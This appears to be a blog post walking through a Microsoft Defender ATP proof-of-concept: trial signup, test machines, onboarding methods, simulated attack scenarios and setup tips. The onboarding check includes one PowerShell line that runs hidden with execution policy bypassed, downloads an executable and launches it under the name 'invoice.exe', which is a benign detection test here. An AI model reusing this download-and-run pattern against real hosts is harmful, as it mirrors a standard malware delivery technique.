Things you need for a successful Microsoft Defender ATP PoC

A step by step information for preparing a successful Microsoft Defender ATP POC.

Trial Information

  1. Trials are good for 60 days.
  2. Trials can convert to production without issue.  We encourage linking a trial to a production Azure AD instance so once purchased the trial becomes production.  This also helps when with trialing Office ATP or if it is already owned as the linking of the services can be done with a simple check mark.
  3. If you already have MDATP licenses (either as E5 or otherwise), you can already start setting up the MDATP service and console now. More information on the MDATP documentation.

Things You Need to get Started

  1. Access to Azure AD Global Admin
  2. Firewall/Proxy set upConfigure endpoint proxy and Internet connectivity settings

Operating Systems to test

  1. A Windows 10 Enterprise version 1809 machine
  2. An additional Windows 10 Enterprise version 1607 or later machine
  3. A Windows 7 SP1 Enterprise (if needed)
  4. A Windows 2012 R2 Server, Windows 2016 Server, and/or Windows 2019 Server machine
  5. A Linux client
  6. A Mac client

Sign up for Trial

  1. http://aka.ms/wdatptrial
  1. After the EULA is signed, the request will be sent to the MDATP Product. This typically takes between 12 to 24 hours.  If you need to expedite due to an urgent need, contact your friendly Microsoft PTS or me for assistance.
     
  2. Once approved, the email used to sign up for trial will receive an email:
Machine generated alternative text:
Windows Defender Adv X -l- v 
signup.microsoft.com 
Windows Defender Advanced Threat 
Protection Trial 
x 
IA 
Want to add this to an existing subscription? 
Sign in 
Welcome, let's get to know you 
Country or region 
This can't be changed after sign-up. Why not? 
First name 
Business email address 
Business phone number 
Company name 
Next O 
Last name
  1. Click “Activate your trial now”:
Machine generated alternative text:
Windows Defender Adv X -l- v 
signup.microsoft.com 
Windows Defender Advanced Threat 
Protection Trial 
x 
IA 
Want to add this to an existing subscription? 
Sign in 
Welcome, let's get to know you 
Country or region 
This can't be changed after sign-up. Why not? 
First name 
Business email address 
Business phone number 
Company name 
Next O 
Last name
  1. If you already have an Azure AD instance do not fill this out. If you do, it will spin up a new AAD instance.  If there is an existing AAD instance, click the “Sign In” button in the upper right. Sign in with an account that has the “Global Admin” role in Azure AD. This is required to set up the instance but not for day to day administration.
  1. After logging in, the following screen appears:
Machine generated alternative text:
Set u p 
Welcome admin
  1. Pick the location that meets the company’s needs.  Data can only reside in one location and this cannot be changed. It is not possible to move an instance from one location to another without a total offboard, wipe, onboard, with all data being lost.
Machine generated alternative text:
Set up your preferences
  1. This section is to help size the MDATP cloud instance. Mainly for engineering use.
Machine generated alternative text:
Set up 
Set up your preferences
  1. This is for informational purposes.
Machine generated alternative text:
Set up your preferences
  1. Once set up is completed, there will be a prompt to onboard machines. This can be done via Group Policy, SCCM, Intune/MDM or by a script. The script will only onboard ten machines. Instructions for Onboarding are listed below.

Configure endpoints using Group Policy

Configure endpoints using System Center Configuration Manager                                                                    

Configure endpoints using Mobile Device Management tools                                                                    

Configure endpoints using a local script                                                                    

Configure non-persistent virtual desktop infrastructure (VDI) machines                                                                    

  1. Confirm that machine has been onboarded successfully
    1. Open an elevated command-line prompt on the endpoint and run the script: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://127.0.0.1/1.exe’, ‘C:\test-WDATP-test\invoice.exe’);Start-Process ‘C:\test-WDATP-test\invoice.exe’
    2. Check the Event Logs
      1. Windows Logs > Application with Event Source WDATPOnboarding and Event ID 20

Testing

Upon completion of setup, a Setup, Walkthrough, and Attack DIY document will be sent. The scenario is a “malicious” phishing attack.  The payload is not malicious but will appear so in the console so you can track an attack.

If you would like to run additional attack scenarios, there are tutorials to 5 different simulations you can run, found in the Help (?) icon on the top right. They include walkthroughs and matching simulation files. The scenarios you can test are:

  1. Document drops backdoor
  2. PowerShell script in fileless attack
  3. Automated Investigation (backdoor)
  4. Automated Investigation (fileless attack)
  5. Custom Detections

Additional Tests to perform (current)

  1. Stop and Quarantine a file
  2. Remove file from Quarantine
  3. Block a file
  4. Remove file from blocked list
  5. Isolate a machine
  6. Undo machine isolation
  7. Collect an investigation package
  8. Run Windows Defender Antivirus scan
  9. Restrict applications from running
  10. Undo restriction of application from running
  11. Use search feature
  12. Onboard a server
  13. Set up machine groups and tags
  14. Power BI reporting
  15. Setup Secure Score
  16. SIEM Integration
  17. Understand and Review an Automatic Investigation
  18. Advanced Hunting

Keys to Success

  1. Do not disable Windows Defender AV via policy or some other way (registry, disable service, etc.) It does not need to be the primary AV but the service must be enabled.
    1. How to Ensure that Windows Defender Antivirus is not disabled by a policy
    2. If you’re running a third-party antimalware client and use Mobile Device Management solutions or System Center Configuration Manager (current branch) version 1606, you’ll need to ensure that the Windows Defender Antivirus ELAM driver is enabled.
  2. Clients must be Windows 10 Anniversary (1607) or higher
  3. Check proxy configuration.  Use the connectivity verification tool to confirm endpoint communication is working. 
  4. If using authenticated proxy, exclude Microsoft URLs.  Remember this is WinHTTP proxy so settings in IE/Chrome/Edge don’t matter.  You must set WinHTTP. Proxy documentation is located here.
  5. The more machines onboarded the better the results.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s